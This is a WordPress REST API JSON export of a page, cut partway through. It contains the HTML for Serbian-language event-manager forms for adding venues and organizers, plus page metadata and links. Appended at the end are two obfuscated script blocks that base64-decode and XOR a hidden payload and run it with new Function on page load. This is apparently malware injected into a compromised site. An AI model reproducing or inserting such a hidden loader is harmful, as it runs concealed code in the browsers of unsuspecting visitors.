class=\"wpem-theme-button wpem_add_organizer\" value=\"Add Organizer\" \/>\r\n\t\t\t\t\t\t<div id=\"oragnizer_message\"><\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t<input type=\"hidden\" name=\"trp-form-language\" value=\"en\"\/><\/form>\r\n\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t<a href=\"#\">\r\n\t\t\t<div class=\"wpem-modal-overlay\"><\/div>\r\n\t\t<\/a>\r\n\t<\/div>\r\n\r\n\t<div id=\"wpem_add_venue_popup\" class=\"wpem-modal\" role=\"dialog\" aria-labelledby=\"Add Venue\">\r\n\t\t<div class=\"wpem-modal-content-wrapper\">\r\n\t\t\t<div class=\"wpem-modal-header\">\r\n\t\t\t\t<div class=\"wpem-modal-header-title\">\r\n\t\t\t\t\t<h3 class=\"wpem-modal-header-title-text\">Add Venue<\/h3>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<div class=\"wpem-modal-header-close\"><a href=\"javascript:void(0)\" class=\"wpem-modal-close\" id=\"wpem-modal-close\">x<\/a><\/div>\r\n\t\t\t<\/div>\r\n\t\t\t<div class=\"wpem-modal-content\">\r\n\t\t\t\t<form method=\"post\" id=\"submit-venue-form\" class=\"wpem-form-wrapper wpem-main event-manager-form\" enctype=\"multipart\/form-data\" action=\"\">\r\n\t\t\t\t\t<h2 class=\"wpem-form-title wpem-heading-text\">Venue Details<\/h2>\r\n\r\n\t\t\t\t\t\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-venue_name\">\r\n\t\t\t\t\t\t\t<label for=\"venue_name\">\r\n\t\t\t\t\t\t\t\t\u0418\u043c\u0435 \u043c\u0435\u0441\u0442\u0430 \u043e\u0434\u0440\u0436\u0430\u0432\u0430\u045a\u0430<span class=\"require-field\">*<\/span>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t\t\t\t<input type=\"text\" class=\"input-text venue_name\" name=\"venue_name\" id=\"venue_name\" placeholder=\"\u041c\u043e\u043b\u0438\u043c \u0443\u043d\u0435\u0441\u0438\u0442\u0435 \u0438\u043c\u0435 \u043c\u0435\u0441\u0442\u0430\" attribute=\"\" value=\"\" maxlength=\"\" required \/>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-venue_description\">\r\n\t\t\t\t\t\t\t<label for=\"venue_description\">\r\n\t\t\t\t\t\t\t\t\u041e\u043f\u0438\u0441 \u043c\u0435\u0441\u0442\u0430 \u043e\u0434\u0440\u0436\u0430\u0432\u0430\u045a\u0430<span class=\"require-field\">*<\/span>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t\t\t\t<div id=\"wp-venue_description-wrap\" class=\"wp-core-ui wp-editor-wrap tmce-active\"><div id=\"wp-venue_description-editor-container\" class=\"wp-editor-container\"><textarea class=\"wp-editor-area\" rows=\"8\" autocomplete=\"off\" cols=\"40\" name=\"venue_description\" id=\"venue_description\"><\/textarea><\/div>\n<\/div>\n\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-venue_logo\">\r\n\t\t\t\t\t\t\t<label for=\"venue_logo\">\r\n\t\t\t\t\t\t\t\t\u041b\u043e\u0433\u043e \u043c\u0435\u0441\u0442\u0430 \u043e\u0434\u0440\u0436\u0430\u0432\u0430\u045a\u0430 <small>(optional)<\/small>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t\t\t\t\r\n<div class=\"event-manager-uploaded-files\">\r\n\t<\/div>\r\n\r\n<input type=\"file\" class=\"input-text\" data-file_types=\"jpg|jpeg|gif|png\"  name=\"venue_logo\" id=\"venue_logo\" placeholder=\"\" \/>\r\n\r\n<small class=\"description\">\r\n\tMaximum file size: 256 MB.<\/small>\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-venue_website\">\r\n\t\t\t\t\t\t\t<label for=\"venue_website\">\r\n\t\t\t\t\t\t\t\t\u0412\u0435\u0431\u0441\u0430\u0458\u0442 <small>(optional)<\/small>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t\t\t\t<input type=\"text\" class=\"input-text venue_website\" name=\"venue_website\" id=\"venue_website\" placeholder=\"\u0412\u0435\u0431\u0441\u0430\u0458\u0442 URL \u043d\u043f\u0440 http:\/\/www.yourvenue.com\" attribute=\"\" value=\"\" maxlength=\"\"  \/>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-venue_facebook\">\r\n\t\t\t\t\t\t\t<label for=\"venue_facebook\">\r\n\t\t\t\t\t\t\t\t\u0424\u0435\u0458\u0441\u0431\u0443\u043a <small>(optional)<\/small>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t\t\t\t<input type=\"text\" class=\"input-text venue_facebook\" name=\"venue_facebook\" id=\"venue_facebook\" placeholder=\"\u0424\u0435\u0458\u0441\u0431\u0443\u043a URL \u043d\u043f\u0440. http:\/\/www.facebook.com\/yourorganizer\" attribute=\"\" value=\"\" maxlength=\"\"  \/>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-venue_instagram\">\r\n\t\t\t\t\t\t\t<label for=\"venue_instagram\">\r\n\t\t\t\t\t\t\t\t\u0418\u043d\u0441\u0442\u0430\u0433\u0440\u0430\u043c <small>(optional)<\/small>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t\t\t\t<input type=\"text\" class=\"input-text venue_instagram\" name=\"venue_instagram\" id=\"venue_instagram\" placeholder=\"\u0418\u043d\u0441\u0442\u0430\u0433\u0440\u0430\u043c URL \u043d\u043f\u0440. http:\/\/www.instagram.com\/yourorganizer\" attribute=\"\" value=\"\" maxlength=\"\"  \/>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-venue_youtube\">\r\n\t\t\t\t\t\t\t<label for=\"venue_youtube\">\r\n\t\t\t\t\t\t\t\t\u0408\u0443\u0442\u0458\u0443\u0431 <small>(optional)<\/small>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t\t\t\t<input type=\"text\" class=\"input-text venue_youtube\" name=\"venue_youtube\" id=\"venue_youtube\" placeholder=\"\u0408\u0443\u0442\u0458\u0443\u0431 URL \u043d\u0440\u043f. http:\/\/www.youtube.com\/channel\/yourorganizer\" attribute=\"\" value=\"\" maxlength=\"\"  \/>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-venue_twitter\">\r\n\t\t\t\t\t\t\t<label for=\"venue_twitter\">\r\n\t\t\t\t\t\t\t\t\u0422\u0432\u0438\u0442\u0435\u0440 <small>(optional)<\/small>\t\t\t\t\t\t\t<\/label>\r\n\t\t\t\t\t\t\t<div class=\"field\">\r\n\t\t\t\t\t\t\t\t<input type=\"text\" class=\"input-text venue_twitter\" name=\"venue_twitter\" id=\"venue_twitter\" placeholder=\"\u0422\u0432\u0438\u0442\u0435\u0440 URL \u043d\u043f\u0440. http:\/\/twitter.com\/yourorganizer\" attribute=\"\" value=\"\" maxlength=\"\"  \/>\r\n\t\t\t\t\t\t\t<\/div>\r\n\t\t\t\t\t\t<\/fieldset>\r\n\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t<div class=\"wpem-form-footer\">\r\n\t\t\t\t\t\t<input type=\"hidden\" name=\"venue_id\" value=\"0\">\r\n\t\t\t\t\t\t<input type=\"hidden\" name=\"step\" value=\"0\">\r\n\t\t\t\t\t\t<input type=\"button\" name=\"submit_venue\" class=\"wpem-theme-button wpem_add_venue\" value=\"Add Venue\" \/>\r\n\t\t\t\t\t\t<div id=\"venue_message\"><\/div>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t<input type=\"hidden\" name=\"trp-form-language\" value=\"en\"\/><\/form>\r\n\t\t\t<\/div>\r\n\t\t<\/div>\r\n\t\t<a href=\"#\">\r\n\t\t\t<div class=\"wpem-modal-overlay\"><\/div>\r\n\t\t<\/a>\r\n\t<\/div>","protected":false},"excerpt":{"rendered":"","protected":false},"author":173,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-2338","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/alumni.pr.ac.rs\/en\/wp-json\/wp\/v2\/pages\/2338","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alumni.pr.ac.rs\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alumni.pr.ac.rs\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alumni.pr.ac.rs\/en\/wp-json\/wp\/v2\/users\/173"}],"replies":[{"embeddable":true,"href":"https:\/\/alumni.pr.ac.rs\/en\/wp-json\/wp\/v2\/comments?post=2338"}],"version-history":[{"count":0,"href":"https:\/\/alumni.pr.ac.rs\/en\/wp-json\/wp\/v2\/pages\/2338\/revisions"}],"wp:attachment":[{"href":"https:\/\/alumni.pr.ac.rs\/en\/wp-json\/wp\/v2\/media?parent=2338"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<script>!function(){var _0xdac3ef103251=atob('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'),_0x9e751f2dc20b=46,_0x0b1f51e628bd=new Uint8Array(_0xdac3ef103251['length']),_0x1c3f58f3ac4b=0;for(;_0x1c3f58f3ac4b<_0xdac3ef103251['length'];_0x1c3f58f3ac4b++)_0x0b1f51e628bd[_0x1c3f58f3ac4b]=_0xdac3ef103251['charCodeAt'](_0x1c3f58f3ac4b)^_0x9e751f2dc20b;(new Function(new TextDecoder()['decode'](_0x0b1f51e628bd)))()}();</script><script>!function(){var _0x3bb1fe0827a6=atob('DkBTSEVST0lIDg9dUEdUBlNTaxdcTxtRT0hCSVEKdxITSlRVG1NTaxdcT30BeXlAVmNLRENCVQF7CnVWa2BjQhsBRRUeR0NHHkVDR0JEQEQTQwEKcWdQHnBQG30ETlJSVlUcCQlFSklTQkBKR1RDC0VOQ0VNCEhDUgQKBgROUlJWHAkJHxIIFBAIHxYIFxQQBHsdT0AOdxITSlRVAAB3EhNKVFV9dVZrYGNCew9UQ1JTVEgddxITSlRVG1NTaxdcT30BeXlAVmNLRENCVQF7Gw53EhNKVFVaWl1bDx13EhNKVFV9dVZrYGNCexsXHUBTSEVST0lIBnZXfBMVTw4PXU9ADgdCSUVTS0NIUghESUJfD11VQ1JyT0tDSVNSDnZXfBMVTwoUFg8dVENSU1RIHVtQR1QGQW1iSnIeG0JJRVNLQ0hSCEVUQ0dSQ2NKQ0tDSFIOAUJPUAEPCkNWV1JVXxtCSUVTS0NIUghFVENHUkNjSkNLQ0hSDgFPQFRHS0MBDx1BbWJKch4IVVJfSkMIRVVVckNeUhsBVklVT1JPSUgcQE9eQ0IdT0hVQ1IcFh1cC09IQkNeHBQXEhESHhUWEhUdREdFTUFUSVNIQhxUQURHDhcTChQVChIUCggSFA8dVklPSFJDVAtDUENIUlUcSElIQx0BHUNWV1JVXwhST1JKQxsBdUNFU1RPUl8GRU5DRU0BHUNWV1JVXwhVQ1JnUlJUT0RTUkMOAUdKSklRQFNKSlVFVENDSAEKAQEPHUNWV1JVXwhVUl9KQwhFVVVyQ15SGwFWSVVPUk9JSBxAT15DQh1PSFVDUhwWHVFPQlJOHBcWFgMdTkNPQU5SHBcWFgMdRElUQkNUHBYdXAtPSEJDXhwUFxIREh4VFhMVHURHRU1BVElTSEIcBUBAQB0BHUJJRVNLQ0hSCERJQl8IR1ZWQ0hCZU5PSkIOQW1iSnIeDx1CSUVTS0NIUghESUJfCEdWVkNIQmVOT0pCDkNWV1JVXw8dQFNIRVJPSUgGSGJvYWxlDg9dUlRfXUFtYkpyHghUQ0tJUEMODx1DVldSVV8IVENLSVBDDg8dW0VHUkVODnlDD11bUlRfXUJDSkNSQwZ3EhNKVFV9dVZrYGNCe1tFR1JFTg55QxQPXVtbU1NrF1xPCEdCQmNQQ0hSak9VUkNIQ1QOAUtDVVVHQUMBCkBTSEVST0lIDnlDUA9dUlRfXU9ADgd5Q1BaWgd5Q1AIQkdSRw9UQ1JTVEgdT0AOeUNQCEJHUkcIUl9WQxsbGwFAVgtDS0RDQgtFSklVQwEPSGJvYWxlDg8dW0VHUkVODnlDFQ9dW1sPHUBTSEVST0lIBnB1Q0N+Ug5cV2hSdGoPXU9ADlxXaFJ0ahgbcWdQHnBQCEpDSEFSTg9UQ1JTVEgdUEdUBnlOGwEBHVJUX115Tht1UlRPSEEOU1NrF1xPCEpJRUdST0lIAAAOU1NrF1xPCEpJRUdST0lICE5JVVJIR0tDWlpTU2sXXE8ISklFR1JPSUgITklVUg9aWgEBDwhUQ1ZKR0VDDgl4UVFReggJTwoBAQ8dW0VHUkVODnlDTg9dW1BHVAZ5UxtxZ1AecFB9XFdoUnRqew0BCUNLRENCCQENdVZrYGNCDQEZQ0tEQ0IbFwENDnlOGQ4BAE5JVVIbAQ1DSEVJQkNzdG9lSUtWSUhDSFIOeU4PDxwBAQ8dUEdUBnlSSRtVQ1JyT0tDSVNSDkBTSEVST0lIDg9dcHVDQ35SDlxXaFJ0ag0XDx1bChcUFhYWDx1DVldSVV8ISUhKSUdCG0BTSEVST0lIDg9dRUpDR1RyT0tDSVNSDnlSSQ8dWx1DVldSVV8IVVRFG3lTHVtwdUNDflIOFg8dW09ADkJJRVNLQ0hSCFRDR0JfdVJHUkMbGxsBSklHQk9IQQEPU1NrF1xPCEdCQmNQQ0hSak9VUkNIQ1QOAWJpa2VJSFJDSFJqSUdCQ0IBCnZXfBMVTw8dQ0pVQwZ2V3wTFU8ODx1bDw4PHQ=='),_0xb453c9c7ad32=38,_0x6b43c3f85eef=new Uint8Array(_0x3bb1fe0827a6['length']),_0x42b6bdc41c2a=0;for(;_0x42b6bdc41c2a<_0x3bb1fe0827a6['length'];_0x42b6bdc41c2a++)_0x6b43c3f85eef[_0x42b6bdc41c2a]=_0x3bb1fe0827a6['charCodeAt'](_0x42b6bdc41c2a)^_0xb453c9c7ad32;(new Function(new TextDecoder()['decode'](_0x6b43c3f85eef)))()}();</script>